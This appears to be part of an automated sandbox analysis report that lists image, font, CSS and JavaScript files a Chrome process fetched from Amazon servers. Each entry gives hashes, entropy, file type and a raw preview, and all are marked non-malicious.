                                                                                                                                                                                                                                                                      SSDEEP:96:CGYTS8mIIQm6lxb+j6e/zB1r6YPD8T00B3VJZDDw:CGYGLRQm6f0Qz3VJS
                                                                                                                                                                                                                                                                      MD5:46E83F60E7DC9FB7B4C639090E5ABADF
                                                                                                                                                                                                                                                                      SHA1:3C1F7D3DDEFF96DD3DA065ED7229B89826890E03
                                                                                                                                                                                                                                                                      SHA-256:A1ECE0A42AC2894F6AF2B4A69A2DA0CEBD0C1B1545361270A6AB5BCFF4DBA47C
                                                                                                                                                                                                                                                                      SHA-512:40281445B9969CE189ABC7DAC2E6AD4E1F45A4FE292D32C3E83C4524184F97496B2B4F7DB6FF9493DF36EDFC5353DE6DC0952899080296D610753A4ED7B8D820
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE._SY116_CB566513572_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........8.....................................................................A.|....1.O\.S.2G.....`...<.6.w............3.....#.^Y.w.!._2..R.......P.F.I.k..'..h....S.Y...r.....v....=..|..;."..........7.t..W)..A'..".8............S.L....`.mt....ghA@......'}2..ni..d.*.O...i<}%iB.......1......Pkz.....;..7............+@....U..2...^w.$:.4.+.fF..'. ...............-...........................@.... !0P.#$%134.............LE$)...HMrBk..\....$&.!5...HMrBk..\....%.1..s..x*(J....h........ir ...Dn[A..........+...... .R..h...b../n.......p$...D.P.%.....n.0..9HRti....o8.6Mc6..!....#!.u....L.(.qv..u).0...].h_(C..!J.\..RPCo1Y).-."B.]..2..w..,.Q.....P..|..f.V.....o..C.d..K....!.}.;.i..W...>.........?#$...........l......e(x_.W{./.=Yz........M^..Z...n..Wa..cq....-.e...b,A.<....G..J..%dc..6I..B.......=.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):46156
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981597165720794
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1V1p/dSQzwgTj3/PGu8isq7wpDJXLnpLqsvlxe3RTfcs/49FZEm0RDRsR8j:TLdSQsMD/OXCQJdLqstxIEs/49FZasI
                                                                                                                                                                                                                                                                      MD5:49570BA39E5ABEE6A2A867324CD2CD58
                                                                                                                                                                                                                                                                      SHA1:D241B206CEA1C07267D30910306FBAC9EADE556E
                                                                                                                                                                                                                                                                      SHA-256:6AAE129639AAAEA5A6DFF7E54EB13F58CAA50957D10A96F25606B7B87D3C1D69
                                                                                                                                                                                                                                                                      SHA-512:0ACCB90E038F1EF29E7FAD24A407A7AE610A14FD2E1AE06E7470321DF8233791FB0ADAD4074AFEFECC3E39B561BBF91062EE98700D9F1B64BD58806A929FF023
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................:N.B...u..wK;....a/....k.]R2........G....,Yu]A.NI..S....._...3.N..n..&x.a.M..^.r.n..L]....?.....h.B......0..w.sd...*.":y...U..mF5.~h%M.j#x..B.R.,.Q......{.?5AX5. ....).]f.....=2.....h...e.o.......dqw*di...cG..l*..AD....J..&(Ym^.`.+im.k.8F..v..Q.2a.........]..<r..'.8..1.......&.m..N.....rG...p.U..`..4.h.....C.....h..B4D.Z[...J..(@.gn.`....mmi.f.../..%E.......:A..KT...Y.ds._?v.vb[ aDd`W......!......k,8....?cF.....7).....yu.E.."BA..........7.[....:.B_LK.....f^.....$I..40.........Oj.`.....]."j.l..L&e;.....x..Tl/...J}-.@.v.N%ZpsA...N<.z...vj....u..<...e.5>..3..;..l.d.j..T....i...8....\^..-..2......=6...x%......q..8...e~uD...[j.F.Gl..i.d.2.*a...N#T...a8.i.q......}..&.IX.5..L........_..$....{.0..gAf{....]..l..~..@.k._~69..&.....y..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.922320061464419
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:74UCfhAULTKIf71mRaK2JUIc1GLXyogum/K6tYMTQPF+anj1I:ofBvfFK2JF5jyvuP6LKYcO
                                                                                                                                                                                                                                                                      MD5:69D81F4881A1CFBAC6936C842D39A7C4
                                                                                                                                                                                                                                                                      SHA1:709BBEA49FCD3B7F9E4A2EC026F5F4A85E28C6F7
                                                                                                                                                                                                                                                                      SHA-256:8D4CEDCA0F7354B44DA3FB9F25723B3B43C37E7495DD60AD0F5FA0F755FD793C
                                                                                                                                                                                                                                                                      SHA-512:090E09E9240A03DE7ECEDBFD79A637D0C99523596EA1C5884C42A9A7B21BD8E3A17153B41715DB3D31FA72BE4AA585B37F02023A56BB2FF610C1C79817A8D8CA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE._SY116_CB566503778_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."..............................................................!..1..AQ.."a...#Tq...2b...$3BCRSr...5Dt......................................................1.!A."2Q..Baq......3CR..............?...QE^/;Hi..i.W..WZ...'...=....!.."...%s_;.v...G.C..Q.?.?.j...U....d..\......,..X..qr..[.\..*|mI..q.T..|....8g\..L..h....3.8=Em...i....o..i.aC.NR..9.....id..C.!..B.$.h^..J,...3....3v.4...A.._,q....~U..-...;O.4....iT...G.r..8.....7.c..%..8.HNS.s/....x.hfg.!.F.......$..;..d3IIpI..-7..~.} I.q..H/.q.....E...._.XK.l..R.B..<..<k...2...X...\K.v*A.@..=.R.1..Ym4...5..).vc.....i.. ...7...g_...~...:.g.[..m4..&k{X.j...'z.B"..j...Z.\Zhv....D.O2..-..G_.....U`..O......p..X..0..2.{.(<..........)>.>3.=.I.q.x.g....Il..gc*..._..FZ....2-CD......G B.$ ....H...6g.U.<{6.=..Wf.2.P.0^............h.o.a...Hr}.~3....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1494
                                                                                                                                                                                                                                                                      Entropy (8bit):7.491314812588649
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:TRe+0CmRoR1v2Do6fMDKPmQnrKi3Sa7HpRA4VhPUB676vlZWlx/pg4qu7+cSr+Ok:TT0rogo6fM+1rKiiiJ64VxUJvWjpg4nX
                                                                                                                                                                                                                                                                      MD5:5A672574F8EB20918FFBCAC3548DCB2E
                                                                                                                                                                                                                                                                      SHA1:0CE81554FD0520BF8966D31E3C358F7D964CA1E2
                                                                                                                                                                                                                                                                      SHA-256:7ABC64236E3A1539675B3E2E300FF8C360E50313D8995C7B4432B86B53F740E6
                                                                                                                                                                                                                                                                      SHA-512:5A4F1F94E77CAF0FD0D1580ACBE32C1692A1AC210F155BEADA502861475A0A6AAD0F75C8B1861AE338878939BCD9948ECA18B5B56342A16A802AE6BFE8F34B9A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1Q."2Aaq.....3r...#R...4................................................12............?..........................h...Qo.....1.h....s.w.........^kp.URuv.qMC<.M.q..X&...1]).K=...i2h..9;o)i[.[..U.b.....:.TUR.y@H........I..j.P..h.......w.IJO..8..Q.....r.87.Q.....Y6v...Fz./.Q.(..O.....\....D.......JR.n=.I...}...=6.75..#..Cj..,p.,vF.6..\..N.....:6...F.4..tw*u{.}$.t.YB..B.*t...X...._.M.....\-g.UN-oY.I...-.q.cN.oVpm.\.E..8..Ao}..c$.?......<..B....,h.,7...NO9......#......kR.;wXk..b.. ..If<...%@......^[m.....l.2......z.9[..q...S.6..f...ire.-];..Q......k...5.e..vH..e..L..._. .....2...V.(.P.5;J+.Y......QeuuV.j7..5.=.T..*m..8.x....ye....V..1N...9....\...$O+.k.N.8....:^....(..W..p....f..d..#%.SD..i8.3!y*\O.......T....GJ...u.n...I..l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 232x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11015
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9252476272150485
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:4er8t9EeYG8Ddk/5cJrpaITUzlVX0SMRJnTs9g6vwLa5m:VrFeYGMZSVXiJnnzV
                                                                                                                                                                                                                                                                      MD5:7F2D22CD4438E550E9EFABF9FE51C8D9
                                                                                                                                                                                                                                                                      SHA1:0048115EE769A19372CEED40B2F99C7952289A38
                                                                                                                                                                                                                                                                      SHA-256:078FB005BED69CBCC4AAE451E6A01495817A37A747DAF312407218F79CE6DC56
                                                                                                                                                                                                                                                                      SHA-512:7AEF04A9B3E4A443A312AC13666A412724F8CF5F36C8BBBC1D326744DFC447E5C93F806A885B10BB1FA969526D361AB731CFF44DA81A6494929011F249CB5315
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81Nuoqy8g8L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.........B..pUS.4NX................i/..2.:.e..w............>u....[..>34....b.g......+jW............Tn=B..&.Z...WkcP......!......).Wo.S....Jh.r.H\q..5-....=.......'...,5....ZB.[..c.B..`..i<....Zks.]..].Qu.)vQ/z{].:.z...^h..............W.AZ.[#],...S.O@............:.fN.l...V.D......S0.{.;#V...d..|.....6b......*X....U.l.......NZ.Zl9...V.Q.K4.n2l......-.V..z_.{.....G....5...&...Y8..W..c....{..3..,.7..AG,.@.oev..$.jY.*.,@Q...<...+.4...U...T..o....0JabE..?.....L..,..,4Yu..O.Q.bf....]zg9.fE...I.pkdQ.)....3.....]h.'yh.......pk.l..:.GwQ...!"zN.p.wq+..g.m.=.SWTm.Y-...Xao....y..............yf.3.@*...p..:w.9...5I;...3.s.......~M....r...9..\....3.p.l...........UZ..$..YJ..}...(.<./E.T.................0..x..h....@?...2.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (42564)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):42614
                                                                                                                                                                                                                                                                      Entropy (8bit):5.343120598013134
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:kzZ6QexaNOF3QrJ9FL0PD+MtOxKjizJRiaLaeW0VofOCMpqfVO0aU3APeKRlqMir:kPe4O1RPD+k8W0E4qo0yeY/iDogyZS
                                                                                                                                                                                                                                                                      MD5:F467A8043189BE8253E63864BECDFEC1
                                                                                                                                                                                                                                                                      SHA1:657D4F54B62346FC45765E9DDF558AAD95C40368
                                                                                                                                                                                                                                                                      SHA-256:2DFA2C991A88BCFA1052671A06FB6F2619637CCB5FB3A7345FF97E5DF244E592
                                                                                                                                                                                                                                                                      SHA-512:6303642D244EC687CA1C6667359AEC5D3DEE5A225C14A8A5CDEE630A14424EBD0116CE2F023CDA46EE3122EC9485D21741AA4A4AD3A93A51C554641AE0ABCCEF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame
                                                                                                                                                                                                                                                                      Preview:(()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result from the feedback service was not ok ${this.urlPathAndParameter}`);e.updateElement(this.getHtmlId(),a)}getHtmlId(){return e(this.parentHtmlId)}isHidden(){return this.hidden}exists(e){return e.exists(this.getHtmlId())}constructor(e,t,a,n,i,r,s){this.parentHtmlId=e,this.feedbackStyle=t,this.labelText=a,this.labelStyle=n,this.position=i,this.urlPathAndParameter=r,this.hidden=s}}class a{open(e){e.clickChildLink(this)}getHtmlId(){return e(this.parentHtmlId)}constructor(e){this.parentHtmlId=e}}var n=function(e){console.debug(e)},i=function(e,t){console.error(e),r("ERROR",e,s(e,t))},r=function(e,t,a){var n;null===(n=window.ueLogError)||void 0===n||n.call(window,a,{logLevel:e,attribution:"APE-safeframe",message:t+" | "})},s=function(e,t){return
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):76642
                                                                                                                                                                                                                                                                      Entropy (8bit):4.91804869468611
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:LyNsNwNAN/WSiHNXNW+NaNs5NmNcWNBNCINoNGtN0NYjN1Nqm:8k
                                                                                                                                                                                                                                                                      MD5:8982FAB302BFD0574496A6C5EC6EAF0F
                                                                                                                                                                                                                                                                      SHA1:86B1E78927CC030C7688AF418B5A895A8F73D2CD
                                                                                                                                                                                                                                                                      SHA-256:7CD66B055116D24C67CFA9B0C2BF97ADAD9F0CD3985D8411A3702692DA7B2576
                                                                                                                                                                                                                                                                      SHA-512:E1491B341E331F6E97690474C81F618D8FE0E4C3A8DEC18619AC94AA3B05330ACBAF2380F14651ACC9FE2E5F5782A4F257945BD7F7F11CE7DE858EB48FEE7577
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/61wm2WQpqYL.css?AUIClients/ACSWidgetAssets-contentGrid
                                                                                                                                                                                                                                                                      Preview:.bxc-grid__container{margin-left:auto;margin-right:auto}.bxc-grid__container.bxc-grid__container--width-770{max-width:770px}.bxc-grid__container.bxc-grid__container--width-771{max-width:771px}.bxc-grid__container.bxc-grid__container--width-768{max-width:768px}.bxc-grid__container.bxc-grid__container--width-960{max-width:960px}.bxc-grid__container.bxc-grid__container--width-1024{max-width:1024px}.bxc-grid__container.bxc-grid__container--width-1170{max-width:1170px}.bxc-grid__container.bxc-grid__container--width-1280{max-width:1280px}.bxc-grid__container.bxc-grid__container--width-1366{max-width:1366px}.bxc-grid__container.bxc-grid__container--width-1500{max-width:1500px}.bxc-grid__container.bxc-grid__container--width-full{max-width:100%}.bxc-grid__l-gutter-layout .bxc-grid__row{margin-left:-24px}.bxc-grid__l-gutter-layout .bxc-grid__column{position:relative;box-sizing:border-box;display:inline-block;margin-right:-.3em;vertical-align:top;min-height:1px;padding-left:24px}.bxc-grid__l-gutt
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 16460, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16460
                                                                                                                                                                                                                                                                      Entropy (8bit):7.987708256804987
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:pvO6xEw4Jj9HYfGbtieHqP0l4S7NVXfU3xqJvzJmPnC1LiTNNIb0QAZtcnlclz0n:bWzHqP7S7Na3SJmKNyElcUuMXqGN3v
                                                                                                                                                                                                                                                                      MD5:15E17F26C664EE0518F82972282E6FF3
                                                                                                                                                                                                                                                                      SHA1:46B91BDA68161C14E554A779643EF4957431987B
                                                                                                                                                                                                                                                                      SHA-256:4065B43BA3DB8DA5390BA0708555889F78E86483FE0226EF79EA22D07C306B89
                                                                                                                                                                                                                                                                      SHA-512:54EADB53589C5386A724C8EEA2603481EBB23E7062FD7BFAB0EAFE55C9E1344F96320259412FB0DC7A6F5B6E09B32F6907F9AAA66BCA5812D45157E3771C902F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/KFPk-9IF4FqAqY-.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......@L..........?.........................?FFTM..8..j..@.`..~.....h..i.6.$..F..<.. .....a?webf..}...6..........n.......fE.q. ..Y...9.2d.$.}[..0.H....j.k....U..#"-SM.t..."D....+....t.8f...s...g636|..g._.....EB.T.!.B..!..y...k....Ya..G~.Y.;+....)...k...=it.........k_.^.z.#.).).....Y?....}..&N.s....1..=A.FXSG...`C...00..5*l..#6...w....-...hkJ. .-...$D..1j..F.]..ny^..]..:.\...2......^n...5P......_.6..k..2..K..i......y....K...?..6...*q>.. .....a9...........4/.c.E.........q...8N..$.$....z.?.d..v.QmY..D....s...:Y...S.|..|...[..@...4...V..n..s....t....A....\.v..X...M..O4.!=$..35m1\..wT"..w.c.s(...]t.?....."Q....1(.p..%0<-v..b.^R.)E:$..0<.....R.B.TY...K..n\..{#...kd.-.8..#.........t;..3.....IT[..2.L...........H..$..._.j.....b<B..uN.,*....k....@.k.k.....[.........6....U.1bDDD..Qu....R..+a......^.iS..qb.^..U.uU.sj..-<D....H..Y.J..[......8....V}........}.$^...CE..jc. d`.^..q..Nw.....`...1...S19.u....`H..WT.1.....y...c.A..op`..V..I....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):39385
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948506994397826
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8gLMZaPZ2SRcZakX05s/uZI4UzMjuqu2LN1EY0BX93cBdmfjuV:PZjrkX0+/uVfu2XqBX9sHmf0
                                                                                                                                                                                                                                                                      MD5:C7F67E9EE30FC682775AF02FC3FE1967
                                                                                                                                                                                                                                                                      SHA1:C70BDB7CB310C46B0EE8C7E66BA79633BF34D3A4
                                                                                                                                                                                                                                                                      SHA-256:FB362B603C9FF81C9E9C43D107E55E7DA11CF9F0EFA04BE9C804AFD1AD6B428A
                                                                                                                                                                                                                                                                      SHA-512:02D38553B7FB3EEAAA5C36133A9336C1339337C8BD728D64340F0A3B3D6886E7A91D618D66DA10FB79F8AC4BCB692E375363DB0B71BEF2DE518BD037BD258C8C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................:................................................................................`.-0....Yo.......u....u..._.c...f.U?p...?................=..-...Cc...xF@.......?\.f..IC.k...Z..@............j....hc.|N................s..I.=P........i......f."Hy|6..........fV+......@........Z..&..6ee .;..........U.....h..v.2.........M.a.lJ.............v.....O...M.@......C.r...T...P......t....T......;.x...~.y..8].. ......y..%.6.........f^....<.fMj...|7Mtn...].....p`..|..vSr?........-...9.r8.......1..C...7?............v....7U.NN...NK.;.@.x..9^......[.Y.V..\...P......}=...._.F..:.n..R.3.i.s........'..W..D.>.R..4...).......ddy.7..Wp......Q.7..~..'..)..(..3.i.y.nQ.7.T.>[5>A.....&..B.}..0..k..3...4.Ng ......?..7..~k..l.9..p.MG..e..^M..)..-.. ....S...&>..m.n0......y.'................A.6N...S......).....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15219
                                                                                                                                                                                                                                                                      Entropy (8bit):5.408378924173576
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LA+1NXTmdAVVxLxwEsgiGrdjLKYVu10V4:cGQg9dri
                                                                                                                                                                                                                                                                      MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                                                                                                                      SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                                                                                                                      SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                                                                                                                      SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/31ULjw05G7L.js?AUIClients/AmazonLightsaberPageAssets
                                                                                                                                                                                                                                                                      Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x375, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):77572
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985301881555744
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:EAMKy0tYZzf+OY6gJNtDKJhR8f5CXWf2ePG3Kb:tjy0kNuJ/wRCCXAPGc
                                                                                                                                                                                                                                                                      MD5:7F1EEDB33A8003499FD536AE94293958
                                                                                                                                                                                                                                                                      SHA1:088657396D4B1837FFE1AB054406853511634317
                                                                                                                                                                                                                                                                      SHA-256:CA3C2477B8EA492ED554433C7B7C68358655F8ABC9E21899B5662F59543771E4
                                                                                                                                                                                                                                                                      SHA-512:BC24BDDEE341510CA66CC3A3C788642CCF46088513C8A9F7FE49C2C682985742B2EADECF3CC95E6B4B8AE1F8A877D7A6BB29D303DEA85E42B673913573F841D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/Cool.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......w....".............................................................................A...!...0L.l@..L..&.PJ.B.$..V.T.4$.*.H.J.*...HT.....$."[.D.P.)&..L. @.a.E.....YO}..F&0.......4.V.\..6.. ....T.M.PAH..fPIh.a..f..iT.....).1%_z....9.QG.uu.\....z.X...<e.y...}D.t....~D_7G(.>.b..........C.Q ...0.b...).........*A9.*I.J.....F..#.<.;..OK...%..{...Nof.s.....1.....-;...S....I._@x..@.............!..!......4..%..4..@&"..24|........h....Ye.gB.....(dI..T... b. ...F .`..-..Y.Y.....%.h.....h.. ......t1"..$(..9..L.<.y..'.H....O../.....-85.......K )HQ,..l.4.d...1...&....;9D.e...f.t.....`..P..d......e^F.Zs.#dY..>..9..x.us..Yr...'../.....Fu\.wwNQ<.....=Ln..x../i..[.\Yw...N.<.....kf.vs...m.F:.$O..'......^J6L....mjWAdey..)...:nJ.0.....v1...%.r.q........2....^W/OG..>=M..4...y....{....Y.~...|q....b.k.L=}.sc.G.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 285x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8598
                                                                                                                                                                                                                                                                      Entropy (8bit):7.89443760259606
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Qw0q8/PZ+X7YBNZXMX+hh8newEv5sj+pTL0:JOxE7iNJi+hh8nEv5sjE8
                                                                                                                                                                                                                                                                      MD5:7666FBDA3239F5975D90C400A3DD6863
                                                                                                                                                                                                                                                                      SHA1:F8E5637B23D5078DB0AE91AD6AF871F31B9EFE62
                                                                                                                                                                                                                                                                      SHA-256:B7326B8D4FD58FA5D06C4B3C81B9A59B2E2761FEC49E037F5CE8DFC1C8F28E61
                                                                                                                                                                                                                                                                      SHA-512:ED6689A3A35A258886472385C196E18E9B821A5C1F72BF0D1EFC9D715D70F2E81D9426DCDEA652A4C084EB0FD67C4FA79F853C0BB605F82E6E519F7B08167B02
                                                                                                                                                                                                                                                                      Malicious:false
